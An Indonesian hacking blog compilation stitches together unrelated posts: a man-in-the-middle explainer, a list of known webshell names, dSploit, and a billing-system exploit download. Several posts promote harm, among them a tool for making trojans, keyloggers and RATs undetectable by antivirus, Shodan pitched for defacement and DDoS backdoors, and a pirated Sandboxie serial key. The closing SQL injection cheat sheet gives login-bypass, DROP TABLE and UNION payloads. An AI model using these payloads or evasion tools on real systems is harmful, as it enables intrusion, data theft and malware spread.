Mitm (man and the midle) berikut tool yg digunakan

Mungkin banyak yang mengira tujuan dari serangan mitm adalah untuk menyadap komunikasi data rahasia, seperti yang sniffing. Sniffing bisa disebut sebagai passive attack karena pada sniffing attacker tidak melakukan tindakan  apa-apa selain memantau data yang lewat.  Memang benar dengan serangan mitm, seorang attacker bisa mengetahui apa yang dibicarakan oleh dua pihak yang berkomunikasi. Namun sebenarnya kekuatan terbesar dari mitm bukan pada kemampuan sniffingnya, namun pada kemampuan mencegat dan mengubah komunikasi sehingga mitm attack bisa disebut sebagai jenis serangan aktif

berikut serangan serangan tengah komunikasi antara dua sistem. Misalnya, dalam transaksi http target adalah koneksi TCP antara klien dan server. Menggunakan teknik yang berbeda, penyerang membagi koneksi TCP asli ke 2 sambungan baru, salah satu antara klien dan penyerang dan lainnya antara penyerang dan server, seperti yang ditunjukkan pada gambar 1. Setelah koneksi TCP dicegat, penyerang bertindak sebagai proxy, mampu membaca, memasukkan dan memodifikasi data dalam komunikasi disadapSerangan MITM sangat efektif karena sifat dari protokol http dan transfer data yang semuanya berbasis ASCII. Dengan cara ini, mungkin untuk melihat dan wawancara dalam protokol http dan juga dalam data yang ditransfer. Jadi, misalnya, itu mungkin untuk menangkap cookie sesi membaca header http, tetapi juga memungkinkan untuk mengubah jumlah transaksi ataupun file penting
berikut contoh serangan MITM
http://www.youtube.com/watch?v=PbiXMlhykSQ&feature=youtu.be
setelah lihat tutornya mungkin mau pantest 
berikut tool nya walaupun tool sejenis banyak
tapi coba 
nb runing di linux
kalau yg pkai backtrack sudah ada
yg mau coba silahkan ini mitm tool
 heheuu selamat ngoprek

emposha PHP-Shell-Detector

backdoor1
backdoorfr
backup.php
backupsql
Blind Shell.cpp
blood3rpriv8
c99_locus7s
c99_madnet
c99_PSych0
c99_w4cking
c99-001
c99-002
c99-003
c99-004
c99-Ultimate
c99
c99(1).php
c99(compressed)
c99unlimited
c100-001
c100
c2007.php
Casus15.php
cgi-python.py
cgi
CMD.asp
CmdAsp.asp
coderz
connectback2.pl
cpanel
Crystal
cshell
ctt_sh
cybershell
CyberSpy5.Asp
darkshell
dC3 Security Crew Shell PRiV
dc3shell
Dive Shell 1.0 - Emperor Hacking Team
DTool Pro
Dx
DxShell_hk.php
EFSO_2.asp
EGY_spider
Ekin0x
elmaliseker.asp
erne
FaTaLisTiCz_Fx
Fatalshell.php
fuckphpshell
g00nshell-v1.3
GFS web-shell ver 3.1.7 - PRiV8
gfs_sh
GNYshell
goon
GSCshell
h4ntu shell [powered by tsoi]
hacker
hellyeah
hiddenshell
htaccess_shell
img.php
iMHaPFtp
indexer.asp
ironshell-001
ironshell
isko
itsecteam_shell
jackal_v1.3
jackal
Java Shell.js
joomla
JspWebshell 1.2
KAdot Universal Shell v0.1.6
Klasvayv.asp
kral
lama
lamashell
Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit
lizozim
load_shell
locusshell
lolipop
lostDC-001
lostDc
lurm_safemod_on.cgi
m1n1shell
mahkeme
mm
Mohajer22-perl
Moroccan Spamers Ma-EditioN By GhOsT
myshell
Mysql interface v1.0
MySQL Web Interface Version 0.8
mysql_shell
mysql_tool
mysql
N3fa5t1cA
NCC-Shell
NetworkFileManagerPHP
nexpl0rer
NIX REMOTE WEB-SHELL v.0.5 alpha Lite Public Version
Nshell (1).php
nshell
nst
nstview
ntdaddy.asp
O0O
onboomshell
pd
perl
perlbot.pl
PH Vayv
PHANTASMA
PHP Backdoor Connect.pl
PHP_Shell
php-backdoor
php-bypass
php-include-w-shell
phpbackdoor15
pHpINJ
PHPJackal
PHPRemoteView
phpshell17
Phyton Shell.py
Private-i3lue
pws
r57 Shell.php
r57_iFX
r57_kartal
r57_Mohajer22
r57-001
r57-002
r57-003
r57.php
r57
r57gentr_c99
r57(compressed)
r57shell1.40
r57shell2.0
r577.php
Rader.asp
Rem Exp.asp
rootaccess
rootshell
ru24_post_sh
Russian.php
s.php
s72 Shell v1.1 Coding
s72
Safe_Mode Bypass PHP 4.4.2 and PHP 5.1.2
Safe0ver Shell -Safe Mod Bypass By Evilc0der
safe0ver-001
safe0ver
save
Server Variables.asp
shell.php
shellbot.pl
SimAttacker - Vrsion 1.0.0 - priv8 4 My friend
simattacker
simple_cmd
simple-backdoor
SimShell 1.0 - Simorgh Security MGZ
Sincap.php
smtpd.py
SnIpEr_SA Shell
sniper
snipershell
spy.php
spyshell
sql
Stakershell
stres
stressbypass
style
sym4
Team SQL
telnet.cgi
telnet.pl
telnetd.pl
Test.php
Tool.asp
toolaspshell
TrYaG
update
Uploader
w.php
w3d.php
w4ck1ng Shell
wacking.php
WebShell.cgi
webshell
WinX Shell
Worse Linux Shell
xinfo.php
zacosmall
zehir4.asp
zehir4

dSploit is an Android network analysis and penetration suite which aims to offer to IT security

dSploit adalah jaringan Android analisis dan suite penetrasi yang bertujuan untuk menawarkan kepada keamanan TI
toolkit profesional yang paling lengkap dan canggih untuk melakukan jaringan(kata developmenya)
The device must have a BusyBox full instal istal dulu bussybox
tcp protocols, perform man in the middle attacks such as password
sniffing

download langsung
download

 https://github.com/evilsocket/dsploit
jalan di gingerbrad

CodeSonar static analysis tool for C/C++

ya sedang mempelajari C/C++ yaa ada tool (framework)analis bagus nih buat mendeteksi kerentaan bug di script anda
misal buat deteksi kerentaan buffer overfloow
dengan tool CodeSonar bisa di cari celahnya nya di mana

 tutor cara penggunanya buat check script anda
http://www.grammatech.com/products/c...nar_quickdemo/
buat yg mau silahkan download saja
ini yg trial nya
langsung saja download
download

blackbery conec to server unix dengan mengunaka putty for mobile

lagi hangat hangatnya nih seputar BB di indonesia yang agar provaider di indonesia menutup aplikasi bb
wow kk wow kasihan sekali kalau gitu gara gara web porno ko kepentingan orang orang tuh memudahkan komunikasi main di blok aja mana bb lagi trends masih mahal pula eh ini di blok makanya jangan cuma lihat dari satu sisi dong mas bro
iya dah tuh hanya unek unek aja dari saya blog go blog kali ini saya akan membahas kegunaan blackbery SSH CONET TO SERVER UNIX/LINUX
loh ko di bb iyalah sekarang ge musimnya bb masa kita mesti diam terus di komputer server tidak mungkin kan 24 jam mesti siaga jadi lewat fasilitas BB kita bisa memantau server unix/linux kita dari bb
oke dah download dulu putty for mobile

setelah di download putty nya anda tinggal seting putty tersebut dan instal di bb anda

     Masukkan nama sambungan. provaider kartu anda
    * Host - Masukkan alamat ip-server.
    * Tipe: SSH, Telnet. Pilih SSH.
    * Otentikasi: Untuk Koneksi SSH Saja. Opsional. Biarkan ini kosong.
    * Username: Masukkan nama pengguna linux.
    * Password: Masukkan password account linux.
    * Jenis Koneksi: Default, TCP / IP, BES, WiFi. Pilih Default. 
pilih sesi dengan trackball
karena font nya menurut saya terlalu kecil silahkan atur font nya menurut selera anda
check konek kan ke server anda dan anda bisa memantau server anda dimana saja kapan saja
tuh ini hanya sebagian dari kegunaan bb makanya jangan cuma memandang kemajuan teknologi dari segi negatifnya saja .oh iya bb yang saya gunakan bb bold.tapi sih pasti bisa lah bb yg lainya juga
jadi pada intinya aplikasi BB bisa juga kan meremote web porno gampangkan kita tinggal cari aja vuln web tersebut lalu root tuh web porno heheu dimana saja kapan saja.
tapi saya blum coba sih mau nya sih tuh didepan bapa pemerintah yang mau hapus BB biar pada tahu  BB  juga bisa bikin rontok web porno bukan hanya menyaksikan aja jadi pada intinya teknologi tuh gimana kita nya aja kalau kita di bentengi dengan akhlak yang baik kita yakin bisa tanpa perlu hapus hapusan aja.buat apa anggaran pemerintah cuma buat ngurusin yang begituan tuh mestinya anggaran negara  buat filter web porn di alihkan buat anggaran bandwitch indonesia biar lebih cepet dan merata

visual basic undeteck tool

kali ini mau share tool buat undetek trojan keyloger rat. supaya tidak k detek
anti virus seperti kita ketahui kadangkala souch kode aplikasi keyloger trojan kita selalu k detek mulu
sama anti virus etss tapi saya nemu juga penangkalanya rootkit ini lumayan bagus juga sih karena sudah saya tester ok langsung aja yahhh jalan di win 2000.xp.vista.win7 belum nyoba sih

link downloadnya visual basic undeteck

video tutornya biar lebih jelas

 tutorial visual basic undetecting
ok selamat mencoba blog go blog

CARA CURANG MAIN GAME CRYPTOGRAM

haha dah tau kan kalau di website LEMBAGA SANDI NEGARA ada permainan flash kaya semacam pengenalan crypografi.http://www.lemsaneg.go.id/crypto

emang tuh game kalau kalau bagi yang suka main paling ketawa...tapi kalau di telusuri lebih lanjut tuh game sangat berguna apalagi bagi seora

Sanboxie dan serial key nya

kali ini saya kan mencoba berbagi serial key sanboxie.walaupun komputer anda sudah di pasang 

anti virus tidak ada salahnya menambahkan sanboxie untuk keamanan sistem window anda

1. Secure Web Browsing: Menjalankan browser Web di bawah perlindungan Sandboxie berarti bahwa semua perangkat lunak berbahaya yang di download oleh browser akan terjebak dalam Sandbox dan dapat dibuang trivial.
2. Enhanced Privasi: Browsing history, cookies, cache dan file-file sementara yang dikumpulkan sewaktu browsing Web tinggal di Sandbox dan tidak bocor ke Windows.
3. Secure E-mail: Virus dan perangkat lunak berbahaya lainnya yang mungkin bersembunyi di email Anda tidak bisa keluar dari Sandbox dan tidak dapat menginfeksi sistem Anda yang sesungguhnya.
4. Windows Stays Lean: Mencegah terjadinya kerusakan di Windows dengan menginstal perangkat lunak ke dalam Box Isolasi Sandbox.
5. Mencegah perubahan pada kedua file Anda dan pengaturan registri, sehingga hampir mustahil untuk setiap perangkat lunak untuk mencapai di luar sandbox.
6. Perangkap item cache browser ke dalam Sandbox sebagai produk sampingan dari operasi normal, sehingga bilaberkut link download 

sandboxie

dan ini serial key nya

membuat scaner mozila acuntiex plus web anti phising atack

menambahkan plugin acuntix pada mozila.....ya so pasti berat cos banyak plugin yg digunakan tapi saya sudah mencoba bahkan memakai 3 plugin ...nyantai nyantai aja tuh....
oh iya bagi yang belum tahu kegunaan acuntik vulberty tuh apa ya ?
acuntix tuh scaner tuh mencari celah pada suatu web baik itu celah  sql injection atau xxs..jangan tanya yach sql injection tuh apa...cape ngejelaisanya.hahaha
tapi kendalanya pasti lah berat si mozila itu haha....tpi kali ini tidak ko 
 pertama tama siapkan--roko  n kopi...nyantai aja gampang ini
1-mozila versi,3 yg saya gunakan download plugin acuntix nya 
disini  acuntix plugin
yach pasti kurang power full kan cuma pakai satu plugin haha nyantai aja
kita juga tambahkan netcraf..anti phising..loh apa gunanya??
haha tuh plugin bisa digunakan untuk mencari stuktur web ,dns.hosting suatu
suatu web..wah pasti makin berat kan..ga juga .nyantai aja download 
di sini netcraft plugin
berikut adalah tampilan mozila scaner

berkut ini adalah tampilan mozila saya.ya so pasti tampilan kaya gini berat ? ga juga lah
berikut cara supaya mozila tuh lebih ringan
1. Buka Mozilla.

2. Ketikan di addres bar “about:config” (tanpa tanda patik).

3. Scroll mouse anda kebawah dan cari “network.http.max-connections“, double klik dan masukan nilai “64“.

4. Cari “network.http.max-connections-per-server“, double klik dan masukan nilai “21“.

5. Cari ‘network.http.max-persistent-connections-per-server“, double klik dan masukan nilai “8“.

6. Doube klik pada “network.http.pipelining ” menjadi “true“.

7. Cari “network.http.pipelining.maxrequests“, double klik dan masukan nilai “100“.

8. Double klik pada “network.http.proxy.pipelining” menjadi “true“.

9. Langkah terakhir, klik kanan dimana saja pilih : New >> integrar >> lalu tulis “nglayout.initialpaint.delay” (tanpa tanda petik”. Kemudian masukan nilai “0“.

coba rasakan?di samping banyak plugin tapi tetep kan mozila nya  ringan..bahkan pakai plugin tampilan..
selamat berexperimen...blog go blog

riset biling explorer

haha selain karya http://bit.ly/at8o09 r robi noparaya tentang cara gratisan di warnet dengan menggunakan metode
kekeluargaan hihihi saya juga mau share tentang cara riset biling di warnet yang menggunakan
billing Billing-Explorer ver 4.43 R-17

* DeskPro 6.0s 2006 R.07 Security#5 Edition
* BillingExplorer Ver DeskPro 6 2007

exploit ini dibikin pkai vb 6

ingat exploitynya jangan di salah gunakan kasihankan para OP apalagi yg masih cupu

semata-mata hanya memperlihatkan penggunaan Winsock dengan visual basic.

nih hanya media pembelajaan link download biling riset

SHODAN Web search engine,untuk mencari perangkat lunak apache-php

Sebuah mesin pencari baru telah diperkenalkan disebut "Shodan" yang memungkinkan Anda menemukan komputer khusus (router, server, dll)ika Anda ingin mengetahui versi dari Microsoft IIS yang paling populer.
Atau Anda ingin melihat berapa banyak anonymous FTP server ada? Mungkin kerentanan baru keluar dan Anda ingin melihat berapa banyak host itu bisa menginfeksi?baik mau melakukan defacing sebuah web atau pasang bacdor DDOS ke sebuah mesin server web 
SHODAN ini lumayan ampuh bahkan bisa melakukan root besar besaran ke sebuah web server
wiih sadis yah  seperti ini tampilan shodan

hasil pencarian bahkan sampai 1000 result
hihiii bagus juga nih buat para atacker
untuk lebih lanjut silahkan ke TKP..
KLIK.         shodan

SQL injection

This information is for educational purpose only.
Please use this information wisely.

Udah pada tau kan soal SQL injection?
Yah kalo belum baca deh Tutorialnya (dulu pernah ta buat)
Itu tutorial basic, sekarang kita ke tutorial advance.
Disini ga akan dibahas gimana cara inject nya tapi berbagai syntax yang bisa kita gunakan
untuk menginject suatu website (jika emang bisa diinject).

Oke, lets’ begin

Syntax SQL Injection
1. Commenting out.
Gunanya untuk mengakhiri suatu query, bypass query.
+ SQL Server
Syntax: –
Penggunaan: DROP namatabel;–
+ MySQL
Syntax: #
Penggunaan: DROP namatabel;#

Contoh penggunaan in real life:
* Username: admin’–
* Proses query yang terjadi di server:
SELECT * FROM userlist WHERE username=’admin’–’ AND password=’password’;
Query ini akan memberikan km akses sebagai admin karena query selanjutnya setelah — akan diabaikan

2. Inline comment
Gunanya untuk mengetahui versi SQL server yang digunakan atau untuk bypass script proteksi
+ SQL Server (MySQL juga bisa)
Syntax: /*Comment*/
Penggunaan: DROP/*comment*/namatabel
atau: DR/**/OP/*bypass proteksi*/namatabel
atau: SELECT/*menghindari-spasi*/password/**/FROM/**/userlist

+ MySQL (mendeteksi versi)
Syntax: /*!MYSQL Special SQL*/
Penggunaan: SELECT /*!32302 1/0,*/1 FROM namatabel
Note: Syntax juga bisa digunakan jika versi MySQL lebih tinggi dari 3.23.02 (sesuai query), tidak berfungsi untuk versi dibawahnya

3. Staking queries
Gunanya untuk menyambung 2 buah query dalam 1 transaksi.
+ SQL Server
Syntax: ;
Penggunaan: SELECT * FROM namatabel; DROP namatabel–

4. Pernyataan IF
Ini kunci jika melakukan Blind SQL Injection, juga berguna untuk testing sesuatu yang ga jelas secara akurat
+ SQL Server
Syntax: IF kondisi bagian-true ELSE bagian-false
Penggunaan: IF (1=1) SELECT ‘true’ ELSE SELECT ‘false’

+ MySQL
Syntax: IF(kondisi,bagian-true,bagian-false)
Penggunaan: SELECT IF(1=1,’true’,’false’)

5. Operasi String
Gunanya untuk bypass proteksi
+ SQL Server
Syntax: +
Penggunaan: SELECT login + ‘-’ + password FROM userlist
+ MySQL Server
Syntax: ||
Penggunaan: SELECT login || ‘-’ || password FROM userlist

Note: Jika MySQL server dalam mode ANSI syntax berfunsi. Cara lain adalah dengan menggunakan fungsi CONCAT() dalam MySQL.
Syntax: CONCAT(str1,str2,str3,…)
Penggunaan: SELECT CONCAT(login,password) FROM userlist

6. Union Injection
Gunanya menggabungkan 2 tabel yang berbeda dengan syarat tabel itu harus sama jumlah kolomnya.

Syntax: UNION
Penggunaan: ‘ UNION SELECT * FROM namatabel
atau: ‘ UNION ALL SELECT * FROM namatabel
atau: ‘ UNION SELECT kolom1,kolom2 FROM namatabel
Proses yang terjadi dalam query:
SELECT * FROM user WHERE id=’1′ UNION SELECT kolom1,kolom2 FROM namatabel

Jika tabel tersebut mempunyai kolom yang berbeda, maka dapat ditambahkan null atau 1
Penggunaan: ‘ UNION SELECT 1,kolom1,kolom2